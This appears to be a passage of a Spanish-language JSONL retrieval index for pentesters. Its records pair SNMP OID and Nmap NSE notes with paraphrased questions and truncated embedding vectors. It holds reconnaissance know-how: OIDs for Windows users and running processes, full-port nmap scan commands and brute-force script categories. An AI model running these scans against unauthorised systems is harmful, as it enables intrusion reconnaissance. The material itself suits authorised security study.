-0.00147, 0.03833, -0.00719, -0.07813, 0.0396, 0.01175, -0.04151, -0.02411, -0.00651, 0.01227, -0.10079, 0.0039, -0.06453, -0.07438, 0.05704, 0.0731, 0.03998, 0.02236, -0.03691, 0.01176, 0.03575, -0.03739, 0.0783, 0.03383, -0.03279, -0.06731, 0.03683, 0.00976, 0.0006, -0.04172, 0.01797, -0.00095, 0.08667, -0.03565, -0.02873, 0.04661, 0.01557, 0.06956, -0.00504, 0.01495, 0.0061, -0.04533, -0.00562, -0.09278, 0.0279, 0.00949, 0.04138, -0.00543, -0.02503, -0.0422, 0.04389, 0.08669, 0.026, -0.06553, -0.04921, -0.0231, -0.02506, -0.05273, 0.0132, -0.10434, -0.02899, 0.04643, 0.06656, -0.06002, 0.0673, -0.06555]} -{"tipo": "pregunta", "herramienta": "SNMP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SNMP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## OIDs ΓΊtiles (numΓ©ricos, no dependen de MIBs instalados)\n```\n1.3.6.1.2.1.25.4.2.1.2 Procesos en ejecuciΓ³n (hrSWRunName)\n1.3.6.1.2.1.25.6.3.1.2 Software instalado\n1.3.6.1.2.1.2.2.1.2 Nombres de interfaces de red (ifDescr)\n1.3.6.1.4.1.77.1.2.25 Usuarios Windows\n```\n- OID = direcciΓ³n jerΓ‘rquica: `iso(1).org(3).dod(6).internet(1)...`\n- Prefijo `1.3.6.1.2.1` (mib-2) es fijo; cambian los nΓΊmeros del final.\n\nRelacionado: Nmap Β· SMB Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "con que puedo extraer fΓ‘cilmente la informaciΓ³n sobre las interfaces de red y usuarios de Windows usando direcciones OID?", "v": [0.04514, 0.11365, -0.12322, -0.14674, 0.11329, -0.05428, -0.11524, -0.07835, -0.01762, -0.12988, -0.055, -0.22423, -0.06956, -0.18046, 0.04349, -0.03211, 0.12583, -0.00623, 0.00943, -0.12678, -0.01196, 0.03358, -0.11924, 0.10044, -0.02749, 0.15037, -0.00082, -0.12307, -0.09246, 0.00803, -0.06635, -0.06102, -0.04702, 0.02659, -0.14913, 0.03373, -0.03817, 0.08402, 0.03587, 0.10504, 0.00411, 0.09611, -0.08723, 0.06127, 0.16154, 0.03712, -0.02858, -0.01828, 0.04787, -0.02103, -0.10331, -0.2108, -0.23421, -0.06229, -0.04625, -0.11536, 0.14413, -0.06435, 0.01036, 0.08099, 0.04594, 0.10229, 0.00971, 0.15653, 0.00012, -0.08495, 0.00382, -0.00121, -0.04049, 0.10462, 0.03614, 0.05786, 0.01251, 0.02952, 0.04197, 0.09677, -0.00821, -0.03844, 0.09672, -0.0107, -0.01835, 0.01995, -0.01585, -0.06507, -0.02649, -0.08997, 0.01166, -0.06418, -0.07552, -0.10488, 0.08833, -0.05493, -0.02514, -0.0265, 0.0751, -0.07576, -0.00829, 0.02731, 0.02583, 0.01617, -0.06523, 0.02567, -0.05591, 0.12032, 0.01905, 0.02144, 0.0387, -0.10644, -0.02201, -0.03566, 0.02123, -0.00842, 0.04326, -0.05747, -0.01933, -0.02665, -0.02534, -0.06048, -0.01717, -0.01927, -0.04925, -0.05637, 0.01961, -0.04139, 0.00839, -0.02829, -0.02181, 0.12251, -0.05851, -0.0544, -0.03643, -0.01886, -0.03814, -0.02523, -0.03409, 0.04171, 0.05237, -0.04912, 0.07271, -0.00803, 0.04745, 0.00273, -0.00612, -0.05304, 0.00314, 0.012, 0.03411, -0.02803, -0.08295, -0.01979, 0.0556, -0.03148, -0.03847, 0.01472, -0.02247, 0.03844, 0.00855, 0.0265, -0.04911, 0.00172, -0.05442, -0.01684, -0.01723, -0.04787, -0.00429, -0.03138, -0.07318, 0.07219, 0.0631, -0.01514, -0.02801, 0.10804, -0.04186, -0.05435, 0.01815, -0.02514, 0.01861, -0.01249, -0.03011, -0.04698, -0.01474, -0.0289, -0.01876, -0.03886, -0.05297, -0.06534, -0.02607, 0.00953, -0.05086, 0.02712, -0.05121, 0.03604, 0.08211, 0.00758, 0.01666, -0.03527, -0.01109, -0.00805, -0.0217, -0.00531, -0.0184, 0.04948, 0.00057, -0.01229, 0.06868, 0.02356, -0.02289, 0.05885, 0.02644, 0.01673, 0.02984, -0.00145, 0.02709, -0.02264, -0.08196, -0.03199, 0.06605, -0.06885, 0.00442, -0.04772, -0.01211, 0.03731, 0.05188, 0.04105, 0.02708, 0.01371, -0.04575, -0.03705, -0.01852, 0.0086, 0.03952, 0.03771, -0.01909, -0.03066, 0.01836, 0.01456, -0.00857, 0.01596, -0.03865, -0.07235, -0.02767, 0.05297, -0.01553, -0.05109, -0.0377, -0.04468, -0.08411, -0.00387, 0.00711, -0.10064, -0.01558, -0.0058, 0.07289, -0.01269, -0.03196, 0.01943]} -{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Nmap NSE (scripts)\n\n> El motor de scripts de Nmap: enumeraciΓ³n profunda y detecciΓ³n de vulns sin herramientas extra. Scripts en `/usr/share/nmap/scripts/`.", "indexar": "que programa sirve para hacer un escaneo profundo de la red y detectar vulnerabilidades?", "v": [-0.09936, -0.085, -0.27795, -0.18738, 0.09354, -0.03914, -0.05486, -0.04204, 0.01097, -0.07668, 0.01676, -0.06317, -0.13345, -0.18974, 0.06529, 0.0668, 0.00685, -0.06491, 0.0935, 0.04818, -0.0239, -0.05161, -0.02032, -0.0316, 0.00594, 0.09622, -0.08145, -0.01179, 0.0277, 0.02646, -0.05283, 0.00756, 0.06947, -0.03998, -0.08665, 0.07206, 0.0515, -0.10605, 0.02823, 0.14262, 0.0498, 0.07412, -0.05215, -0.05416, 0.11051, -0.07478, -0.04664, -0.08335, -0.00743, 0.05191, -0.0749, -0.01791, -0.13376, -0.08892, 0.00236, -0.11455, -0.00696, -0.04883, 0.0374, -0.07587, -0.0912, 0.03087, 0.09929, -0.01307, 0.02988, -0.07255, 0.03257, 0.04312, -0.05559, 0.0882, -0.03715, 0.00424, 0.04721, 0.04764, -0.03574, 0.0033, 0.00643, -0.03885, 0.08747, -0.07819, -0.03424, 0.08038, 0.01554, 0.05525, -0.15021, -0.05299, 0.11475, -0.00219, 0.02615, -0.08693, 0.0629, 0.07306, 0.02611, 0.05964, 0.09523, -0.02779, 0.16098, -0.02787, -0.03025, 0.05015, 0.00779, -0.12774, -0.08847, 0.08248, 0.05001, 0.11503, -0.01319, 0.0189, 0.00827, 0.01662, -0.03114, 0.0052, -0.05977, -0.09162, -0.05158, 0.02987, 0.0472, 0.02683, 0.05483, 0.03348, -0.10341, -0.04388, -0.09933, -0.00475, 0.04295, -0.05565, -0.08366, 0.02702, 0.0078, 0.06811, -0.04474, 0.01105, -0.05637, -0.00946, -0.08828, -0.02844, 0.03041, -0.1233, -0.03775, 0.00858, -0.02008, 0.09081, -0.0476, 0.00217, -0.02435, 0.10875, 0.03531, -0.0615, -0.02909, 0.08063, -0.0031, 0.03799, -0.10248, 0.02247, -0.07042, -0.04244, 0.03483, 0.00417, -0.05693, 0.07764, -0.015, 0.0143, -0.02931, 0.00999, 0.03608, -0.03181, 0.04653, 0.0209, 0.09312, 0.04298, -0.04208, 0.07992, 0.0354, -0.07871, -0.03519, -0.02488, 0.03697, -0.10861, 0.04789, -0.05827, -0.02948, -0.01199, 0.08894, -0.00953, 0.01043, -0.01633, -0.03762, 0.00282, 0.02245, -0.01289, 0.02342, -0.05042, -0.01503, 0.03849, 0.05145, 0.02224, 0.01382, -0.01726, 0.02654, -0.05365, -0.09342, 0.00997, -0.02203, 0.00567, 0.03627, 0.0667, -0.02052, -0.02332, 0.06691, 0.13278, -0.01811, 0.02685, 0.06138, -0.01134, -0.05945, -0.03316, -0.01202, 0.10385, 0.05082, 0.04304, 0.00279, -0.05832, 0.01949, 0.04941, -0.01862, -0.03774, 0.0009, -0.05774, 0.06781, 0.02189, 0.06395, -0.06213, -0.03415, -0.04468, -0.01676, -0.04235, 0.03006, 0.02914, -0.01214, -0.07727, 0.01543, 0.02674, -0.00774, -0.05114, 0.02292, -0.03981, 0.00076, 0.01238, 0.02189, -0.00546, -0.0714, 0.05965, 0.03135, -0.1127, 0.05731, -0.00758]} -{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Nmap NSE (scripts)\n\n> El motor de scripts de Nmap: enumeraciΓ³n profunda y detecciΓ³n de vulns sin herramientas extra. Scripts en `/usr/share/nmap/scripts/`.", "indexar": "con quΓ© puedo realizar una auditorΓ­a de seguridad detallada sin instalar otras herramientas?", "v": [0.09991, 0.14829, -0.09012, -0.13588, 0.10375, -0.10296, -0.04189, -0.05995, -0.15701, 0.02772, -0.18096, -0.02967, -0.0358, -0.02458, 0.11882, -0.02677, 0.09029, -0.13271, 0.00013, 0.07938, 0.09067, -0.04022, -0.06746, 0.03985, -0.10101, 0.04964, 0.086, -0.03897, -0.13261, -0.02285, 0.02118, 0.07016, 0.09637, 0.01201, -0.11551, -0.01663, 0.01465, 0.00666, 0.03958, 0.03399, -0.03148, -0.00084, 0.04386, 0.10694, 0.13765, -0.11236, -0.01404, -0.00539, 0.05785, -0.02055, -0.06164, 0.00899, -0.07078, -0.06013, 0.02679, -0.17243, 0.15242, -0.06365, 0.15603, -0.09756, -0.16519, 0.07207, -0.02559, 0.15024, 0.01281, 0.07847, 0.02122, -0.02549, -0.03586, 0.07266, -0.03276, -0.03497, -0.0319, 0.04875, -0.08141, -0.04484, -0.01469, 0.05921, -0.01291, 0.01725, 0.0415, 0.04841, -0.04645, -0.00195, -0.12644, -0.06207, -0.03267, 0.00463, -0.01356, -0.05558, 0.00912, 0.01325, 0.03287, -0.01686, -0.00813, -0.06487, 0.13241, 0.02102, -0.06952, -0.03461, 0.03376, -0.07421, 0.05236, 0.12121, 0.00992, 0.00174, -0.01969, -0.02556, 0.0141, -0.09121, -0.05068, 0.11138, -0.10023, -0.09316, -0.04297, -0.02174, -0.0236, -0.05188, -0.03187, -0.00276, -0.03095, 0.01893, -0.04544, 0.04167, 0.00291, -0.09715, 0.05363, 0.10348, 0.03217, -0.02293, 0.05047, -0.07585, -0.06446, -0.01616, -0.01798, -0.01519, -0.09871, -0.1117, -0.07774, -0.05382, 0.00388, 0.03105, 0.02769, -0.03158, 0.02479, 0.01299, -0.04671, -0.05651, -0.07912, -0.02626, 0.01722, 0.01378, -0.03444, 0.05942, -0.02694, 0.00775, 0.0473, -0.02326, 0.00742, 0.0327, 0.04584, -0.01454, 0.05024, -0.00716, 0.01052, -0.01235, -0.03076, -0.05357, 0.07642, -0.00641, -0.02571, 0.06154, 0.06007, -0.07385, 0.02768, -0.05519, -0.00795, -0.13973, 0.05014, -0.11147, -0.04488, 0.07416, -0.01239, -0.03155, 0.05643, -0.09459, 0.02685, -0.04131, 0.03492, 0.06094, 0.02162, -0.00426, -0.05648, -0.01063, 0.03444, -0.00696, -0.01908, -0.09054, -0.06627, 0.00185, -0.07501, 0.00246, -0.04225, -0.0901, 0.11114, 0.02626, -0.04377, 0.05387, -0.02015, 0.01788, 0.09561, 0.00376, 0.04786, -0.08778, 0.01779, -0.009, 0.01414, -0.00888, -0.0682, 0.06492, -0.00179, 0.0063, 0.08668, -0.03044, -0.01141, -0.01443, 0.02664, 0.0285, 0.03652, 0.06903, -0.01794, 0.00527, -0.03258, -0.03251, 0.02225, -0.01776, 0.00638, -0.04429, -0.02945, -0.06077, 0.03935, 0.08133, 0.00123, -0.06995, -0.07464, -0.03006, -0.02184, 0.00604, -0.01839, -0.09037, -0.01654, 0.06152, 0.07182, -0.02942, -0.0259, -0.04589]} -{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## El comando que usas siempre\n```bash\nsudo nmap -sCV -p- IP # -sCV = -sC (scripts default) + -sV (versiΓ³n)", "indexar": "que herramienta sirve para escanear puertos y detectar versiones de servicios", "v": [0.11776, -0.06941, -0.24692, -0.24426, 0.06484, -0.17751, 0.03614, -0.15305, -0.00965, -0.04847, -0.10731, -0.00389, -0.0078, -0.11492, 0.10527, 0.01261, 0.05514, -0.12032, 0.07717, 0.03969, -0.02814, 0.01662, -0.05185, -0.03952, -0.10453, 0.04743, -0.00748, -0.07146, -0.12769, 0.08103, -0.02429, 0.01644, 0.08282, -0.02573, -0.10321, -0.13182, -0.02723, -0.06676, 0.05637, 0.09248, 0.0889, 0.02969, -0.01448, -0.03542, 0.0658, -0.03863, -0.06433, 0.03701, 0.0676, 0.0916, -0.0245, -0.09547, -0.16957, 0.0591, -0.05862, -0.09355, 0.10879, -0.00065, 0.03204, -0.15079, -0.1121, 0.04746, -0.04425, -0.06098, 0.04363, -0.08035, -0.01808, 0.00207, -0.07233, 0.00681, -0.10829, 0.04481, 0.13398, 0.04471, -0.06203, -0.1092, 0.01161, 0.06664, 0.041, 0.05473, 0.07734, -0.00549, -0.10712, 0.02093, -0.04703, -0.05332, -0.03643, -0.02313, 0.10264, -0.1619, 0.01705, 0.04906, -0.01561, 0.09314, -0.03116, 0.00306, 0.12293, -0.04502, -0.00336, -0.02234, 0.15509, -0.04566, -0.0697, 0.07909, -0.03625, 0.00191, 0.00948, -0.0611, -0.03509, -0.00719, 0.08555, 0.02042, 0.02624, -0.0265, -0.03304, 0.04452, 0.02807, -0.0639, -0.03237, 0.04074, 0.01757, -0.05436, -0.07042, -0.05143, 0.00658, -0.03917, -0.00521, 0.04742, 0.04335, -0.05783, 0.03456, -0.07297, -0.08646, -0.03151, -0.05701, -0.01975, 0.03277, -0.14826, -0.02681, -0.02128, -0.04116, 0.08184, -0.06166, -0.01821, 0.01838, 0.03852, 0.03487, -0.00327, -0.00768, -0.0493, 0.05094, -0.02595, -0.10467, 0.03504, -0.08082, -0.0241, 0.05088, -0.00106, -0.10831, 0.06688, -0.0275, -0.02238, 0.05262, -0.00047, 0.01662, -0.04661, 0.03547, 0.03203, 0.0789, 0.03104, 0.00891, 0.05866, 0.02545, -0.09034, 0.00841, -0.00401, -0.02906, -0.01627, -0.0141, -0.03388, -0.05251, 0.00349, -0.04861, -0.0655, -0.00036, -0.06198, -0.02141, -0.08478, -0.01992, 0.0178, 0.03449, -0.00138, -0.01832, -0.04011, 0.03407, 0.04869, 0.00133, -0.02488, 0.02876, -0.03269, -0.05349, -0.0029, -0.02185, -0.0275, 0.01292, 0.05169, -0.01618, 0.02111, 0.05119, 0.0452, -0.01231, 0.02899, -0.00861, -0.02085, -0.01341, -0.0278, -0.01367, 0.03884, 0.02611, 0.0429, -0.06699, -0.01818, 0.00185, 0.02856, -0.02803, 0.02065, 0.04852, 0.00446, 0.04442, -0.0101, 0.06862, -0.01474, -0.03214, -0.01753, -0.01875, -0.09066, 0.04955, 0.00018, -0.03848, -0.08372, 0.01157, 0.00875, 0.03091, -0.02253, 0.02169, -0.06538, 0.04454, -0.03174, 0.02108, -0.01115, -0.0621, 0.05757, 0.03816, -0.06666, 0.02322, -0.0245]} -{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## El comando que usas siempre\n```bash\nsudo nmap -sCV -p- IP # -sCV = -sC (scripts default) + -sV (versiΓ³n)", "indexar": "como puedo usar comandos bash para hacer un anΓ‘lisis detallado de la red", "v": [0.11887, 0.09887, -0.0629, -0.06394, 0.02442, -0.08084, 0.01886, -0.0837, -0.14136, -0.00062, -0.18861, -0.11065, -0.04164, -0.05498, 0.02246, 0.03075, 0.0158, 0.05853, -0.04313, -0.06493, 0.12068, -0.13702, -0.13526, 0.02945, -0.00105, 0.09135, 0.06544, -0.06683, -0.10914, -0.01152, -0.05284, 0.01666, -0.00123, -0.03553, -0.09292, 0.074, -0.02776, -0.04477, -0.06697, 0.1968, -0.15465, -0.00583, -0.13814, 0.02431, 0.10565, -0.09923, 0.00944, 0.04115, -0.0396, -0.08682, 0.04438, -0.12596, -0.15541, 0.00645, -0.04374, -0.15581, 0.14703, -0.10624, -0.02537, 0.03411, 0.01625, -0.05317, 0.02662, 0.16565, -0.02785, -0.07892, -0.07902, -0.06654, -0.01051, 0.09819, -0.0589, 0.13995, -0.08494, 0.0733, 0.024, 0.05432, -0.03884, 0.01396, 0.08947, -0.01335, -0.05709, 0.06483, -0.07718, 0.05336, -0.09816, -0.12415, 1e-05, -0.07861, 0.03566, -0.07021, 0.02569, -0.04601, 0.03025, -0.01066, 0.07819, 0.01674, 0.00198, 0.00957, 0.02002, 0.0032, 0.05152, -0.02288, -0.04344, 0.10101, 0.03718, 0.007, 0.07025, -0.06254, 0.02194, -0.03924, 0.02034, -0.11995, -0.0341, -0.08429, -0.06911, -0.10567, -0.04747, -0.04522, -0.01341, -0.05474, -0.10307, 0.03569, -0.01483, 0.0041, 0.00579, -0.06625, -0.03293, 0.06115, 0.02223, 0.00806, -0.06772, 0.02513, 0.02212, -0.07456, -0.01635, 0.09314, -0.05992, -0.01821, -0.13215, -0.09999, -0.03242, 0.10563, -0.0292, 0.0082, 0.02734, 0.02022, 0.00604, -0.07148, -0.05478, 0.01909, 0.07589, 0.05953, -0.06399, 0.0128, 0.01052, -0.07818, 0.02942, 0.01056, -0.0395, 0.07462, 0.00897, -0.03519, -0.0732, 0.01658, 0.06157, -0.00307, -0.03704, -0.02845, 0.0006, 0.02811, -0.00647, 0.00788, -0.01419, -0.0482, 0.04798, -0.08237, -0.01231, -0.06667, -0.01831, -0.03623, 0.05324, 0.0242, -0.0475, -0.04005, 0.00895, 0.00942, 0.04324, -0.04297, 0.01661, -0.01338, -0.04904, 0.0669, 0.0726, 0.03798, 0.01103, 0.00474, 0.04166, -0.0468, -0.06126, -0.04646, -0.06756, 0.06736, -0.00262, -0.05942, 0.04465, 0.02402, -0.06914, 0.06466, 0.01889, 0.03035, 0.00627, 0.00308, 0.06863, 0.00974, -0.06022, -0.0329, 0.01136, -0.02708, -0.01027, -0.04183, 0.02879, 0.0705, 0.03206, 0.04244, 0.02669, -0.0189, 0.01073, -0.06287, 0.03155, 0.06248, 0.03657, 0.02951, 0.01057, -0.04341, -0.02635, -0.00083, 0.01612, 0.04447, -0.02551, -0.02607, 0.02915, 0.09234, -0.04015, -0.05002, 0.02106, -0.06603, -0.1054, 0.0342, -0.02948, -0.05216, -0.00786, 0.01205, 0.03255, -0.08629, -0.00663, -0.01482]} -{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# patrΓ³n real de tu history_contabo.txt:\nnmap IP -p- -Pn --min-rate 5000 -vvv -n --open # rΓ‘pido todos los puertos\nnmap -p- localhost -sCV # luego versiΓ³n+scripts sobre lo abierto\n```\nFlujo tΓ­pico: 1) `-p- --open` rΓ‘pido para ver QUΓ‰ abre β†’ 2) `-sCV` dirigido a esos puertos.", "indexar": "que programa hay que pueda escanear todos los puertos de una direcciΓ³n IP rΓ‘pidamente?", "v": [0.04412, -0.0588, -0.1803, -0.09556, 0.09318, -0.24188, 0.20177, -0.13286, -0.15259, -0.03466, 0.10495, 0.06785, 0.0245, -0.13166, -0.07686, 0.00998, 0.06335, 0.02422, 0.13967, -0.05101, -0.05569, 0.13063, -0.0728, 0.00685, -0.023, 0.07489, -0.06806, 0.07673, -0.10372, -0.08554, -0.09677, 0.01721, 0.04081, -0.05657, -0.0556, -0.15221, 0.07734, 0.05784, 0.10548, 0.06151, 0.00371, -0.01064, -0.06256, -0.08388, 0.07216, -0.02051, 0.01078, -0.01464, 0.05781, -0.08768, -0.10407, -0.04966, 0.01456, 0.01424, -0.04544, 0.02816, -0.02291, 0.02293, -0.06876, -0.06998, -0.02909, 0.09752, -0.01682, -0.08651, -0.00803, -0.03307, 0.02693, 0.02739, -0.09646, -0.08153, -0.04968, -0.02171, 0.0052, 0.11822, -0.00531, -0.07236, -0.04661, 0.05907, 0.01524, 0.04442, 0.04583, 0.03176, -0.06126, -0.00221, -0.07529, -0.04409, -0.00277, -0.13306, 0.01455, -0.11541, 0.02926, 0.01001, -0.0178, 0.12954, -0.00564, -0.00155, 0.10733, 0.09198, 0.01387, 0.0197, -0.01317, 0.0328, -0.1388, 0.11412, 0.06407, 0.12217, 0.10719, -0.03923, 0.07697, 0.11457, -0.01543, 0.06025, 0.01614, -0.13009, -0.07978, -0.01009, -0.03849, -0.11117, 0.04195, -0.00447, -0.05713, -0.09856, -0.01677, 0.02561, 0.03775, 0.03617, 0.01754, 0.12557, 0.03953, 0.04952, -0.00236, -0.02386, -0.06182, -0.02941, -0.02176, -0.0478, -0.03733, -0.04656, 0.01802, -0.04056, -0.00285, 0.0217, -0.00384, -0.0218, 0.0086, -0.06561, -0.00868, -0.09611, -0.06012, 0.00027, 0.03858, 0.08542, -0.03695, 0.03168, -0.0788, 0.07732, 0.09313, -0.02333, -0.02909, 0.05344, -0.05988, 0.0259, 0.00212, -0.03052, 0.05977, -0.06606, -0.06906, 0.06494, 0.06745, 0.00013, -0.0499, 0.12734, -0.04491, -0.07017, -0.02232, 0.00725, -0.00243, -0.08077, -0.01415, 0.00826, -0.075, 0.04627, -0.0012, -0.03411, -0.02555, -0.04734, -0.00037, -0.01454, -0.01845, 0.03791, 0.08267, 0.0082, -0.05556, 0.01261, -0.05937, -0.01022, -0.04533, 0.02538, 0.03644, -0.05787, -0.0268, 0.0103, 0.02495, -0.01005, 0.01327, 0.04923, -0.05101, 0.01731, 0.00819, 0.09454, -0.01146, -0.04691, 0.04521, -0.01323, -0.04752, 0.02589, 0.02699, 0.04687, 0.05826, 0.06198, -0.0382, 0.03656, 0.01551, 0.0367, -0.04088, -0.04683, 0.02984, 0.04218, 0.03462, 0.03029, -0.00458, -0.01497, -0.04981, -0.07325, 0.03265, 0.01308, -0.01852, -0.04121, -0.00814, -0.0508, 0.00386, 0.02145, 0.0008, -0.03799, -0.01564, -0.04299, -0.05392, 0.04613, 0.03609, -0.01865, -0.04338, 0.03938, 0.00822, -0.04382, 0.0219, -0.01847]} -{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# patrΓ³n real de tu history_contabo.txt:\nnmap IP -p- -Pn --min-rate 5000 -vvv -n --open # rΓ‘pido todos los puertos\nnmap -p- localhost -sCV # luego versiΓ³n+scripts sobre lo abierto\n```\nFlujo tΓ­pico: 1) `-p- --open` rΓ‘pido para ver QUΓ‰ abre β†’ 2) `-sCV` dirigido a esos puertos.", "indexar": "con quΓ© puedo saber de forma rΓ‘pida quΓ© puertos estΓ‘n abiertos en un servidor?", "v": [0.03043, 0.12339, -0.17176, -0.00608, -0.04841, -0.07449, 0.18136, -0.17101, -0.01698, -0.12917, -0.14342, 0.00421, 0.09595, -0.07959, 0.03012, 0.01968, 0.15345, -0.02694, 0.05861, 0.06019, -0.00283, -0.05581, -0.02109, -0.07935, -0.02356, -0.00475, 0.06335, 0.03852, -0.15741, 0.01623, -0.01944, 0.01846, 0.05459, 0.0557, 0.04893, -0.03016, 0.03775, 0.14673, -0.02304, 0.04163, 0.06177, 0.00406, -0.02958, -0.03705, 0.10485, -0.03787, -0.07343, -0.12557, 0.10098, -0.0459, -0.05882, -0.06093, -0.11943, -0.04183, -0.07336, 0.0425, 0.06936, -0.05088, 0.08533, -0.03786, -0.09918, 0.08074, -0.04804, -0.06918, 0.0285, -0.05306, -0.04217, 0.04797, -0.07267, -0.06759, -0.10775, -0.06289, -0.02916, 0.03064, 0.02026, 0.06267, -0.07009, 0.02814, 0.08044, 0.11856, 0.07188, 0.06907, -0.02965, -0.00993, -0.02192, -0.06703, -0.11892, -0.01796, 0.01494, -0.08144, 0.0884, 0.06039, -0.04844, 0.16514, -0.04348, -0.02439, -0.01493, 0.03619, -0.04624, 0.04426, 0.02692, 0.08353, -0.09024, 0.0801, -0.03648, 0.06934, 0.03058, -0.12237, 0.05937, 0.02362, 0.1159, 0.02697, -0.0124, -0.02718, -0.0409, -0.04602, -0.01649, -0.05092, -0.0284, 0.07256, -0.04941, -0.07925, 0.01502, 0.02218, 0.01844, -0.06491, 0.04191, 0.06646, 0.02431, -0.00244, 0.02741, -0.05689, -0.11106, -0.08207, 0.01076, -0.03099, 0.04166, -0.07716, -0.01908, -0.08084, -0.0463, 0.01247, -0.03468, -0.01847, 0.06408, -0.04559, 0.06231, -0.06436, -0.11708, -0.03201, 0.02791, -0.00534, -0.05294, 0.00115, -0.09686, -0.01053, 0.08101, -0.10155, -0.04465, 0.07732, 0.00849, 0.07221, -0.05484, 0.05218, 0.03197, -0.07394, -0.02081, 0.03529, 0.0389, 0.04541, -0.04445, 0.06616, -0.06046, -0.05476, 0.03684, -0.02337, -0.1245, -0.05322, -0.03657, -0.04055, -0.02771, 0.04993, -0.06932, -0.02367, -0.13792, -0.10398, 0.02217, -0.05142, -0.01622, 0.1103, 0.06074, 0.02981, -0.03752, -0.01738, 0.00373, -0.05313, 0.01395, 0.01416, -0.03532, -0.04229, 0.00157, -0.04077, 0.00667, -0.04569, 0.00479, 0.01744, -0.10002, 0.06715, 0.01604, 0.07312, -0.00071, -0.02712, 0.1305, -0.03831, -0.01214, 0.05102, 0.00369, -0.01379, 0.04194, 0.01383, -0.00761, 0.03713, -0.01615, -0.00021, 0.04856, 0.03934, 0.03242, 0.02268, 0.0651, 0.05108, 0.00266, 0.01559, -0.06975, -0.05465, 0.01658, -0.01036, -0.01869, -0.0569, -0.02733, -0.02273, 0.05001, 0.06051, -0.01836, -0.06354, 0.03528, -0.09025, -0.03973, 0.02554, -0.04725, -0.06164, -0.09384, 0.01856, 0.00532, -0.04478, 0.02419, -0.02841]} -{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## CategorΓ­as de scripts\n```\ndefault (-sC) los seguros y ΓΊtiles por defecto\nvuln comprueba vulnerabilidades conocidas\nsafe / auth no intrusivos / temas de autenticaciΓ³n\nbrute fuerza bruta de credenciales\ndiscovery enumeraciΓ³n (snmp, smb, http...)\n```", "indexar": "que herramienta sirve para comprobar vulnerabilidades en un sistema?", "v": [0.05302, 0.06223, -0.2486, -0.19743, 0.06802, -0.09416, -0.04814, -0.09495, 0.03457, -0.15589, -0.05184, -0.03018, -0.04703, -0.06563, 0.03899, 0.0523, 0.03435, -0.21932, -0.02598, 0.05651, 0.02517, -0.04567, -0.09476, -0.10879, -0.12094, 0.09886, -0.03063, -0.09064, -0.1405, 0.01744, -0.04701, -0.00115, 0.05262, -0.05552, -0.12597, 0.03778, -0.02534, 0.00802, 0.04588, 0.0731, 0.11652, 0.0477, 0.01354, 0.04777, 0.05094, -0.0077, -0.06523, -0.04684, -0.00406, 0.04473, -0.09344, -0.10459, -0.17506, -0.04018, -0.00598, -0.16795, 0.1462, -0.07972, 0.05351, -0.13067, -0.10833, 0.01661, 0.00094, -0.05424, 0.05965, -0.02764, 0.00122, -0.04889, -0.12251, 0.08402, -0.03105, -0.00883, 0.0325, 0.01704, -0.09778, -0.07167, 0.08216, 0.02656, 0.02406, -0.01912, 0.03604, 0.02953, -0.06192, 0.04523, -0.08722, -0.09175, 0.10917, -0.0187, 0.04485, -0.07804, 0.05397, 0.06009, 0.01943, 0.04145, 0.05321, -0.02407, 0.07655, -0.06147, -0.04326, -0.03255, 0.08446, -0.07951, -0.05718, 0.08886, -0.05488, 0.04185, -0.02749, 0.01985, -0.00518, -0.09519, 0.00918, 0.02487, -0.0143, -0.03219, -0.04734, 0.08818, -0.0191, -0.00243, -0.01487, -0.03347, 0.02859, 0.00984, -0.08695, -0.06217, 0.05014, 0.02476, -0.01557, 0.04842, 0.02991, -0.02428, 0.03006, -0.06207, -0.08308, 0.09069, -0.01264, -0.01473, 0.00902, -0.09982, -0.05026, -0.0039, 0.01051, 0.09512, 0.01, -0.07347, 0.04472, 0.05847, 0.07086, -0.05367, -0.05601, 0.00797, -0.0045, -0.00736, -0.0538, 0.02236, -0.04801, 0.00424, -0.01782, -0.0135, -0.08901, 0.03223, 0.00177, -0.01422, 0.05618, 0.07493, -0.00164, -0.01326, 0.06831, 0.00322, 0.13319, 0.04278, 0.04166, 0.04074, 0.11126, -0.03045, 0.01307, -0.04777, -0.01515, -0.03542, 0.00901, -0.07051, -0.04812, -0.01489, 0.00888, -0.01053, 0.03426, 0.01686, 0.02653, 0.00955, 0.04106, 0.05001, 0.01429, 0.01897, 0.00673, 0.00093, 0.04161, 0.02288, -0.04441, -0.05186, 0.02309, -0.02916, -0.10114, 0.01703, -0.01243, -0.06859, 0.05157, 0.10886, 0.05142, -0.03135, 0.03485, 0.08707, 0.0161, 0.03707, 0.06056, -0.03493, -0.0495, -0.03382, -0.01538, 0.06142, -0.03132, -0.06819, 0.00928, -0.04668, 0.0294, 0.03601, 0.00061, 0.01509, -0.01808, -0.00173, -0.00011, -0.01556, 0.05024, -0.08688, -0.01314, -0.00657, 0.01833, -0.108, 0.0177, -0.00358, -0.03898, -0.06767, 0.01726, 0.03563, 0.02261, -0.07188, -0.01973, -0.06784, -0.01664, -0.05258, -0.01225, -0.10551, -0.06761, 0.03859, 0.04443, -0.06729, 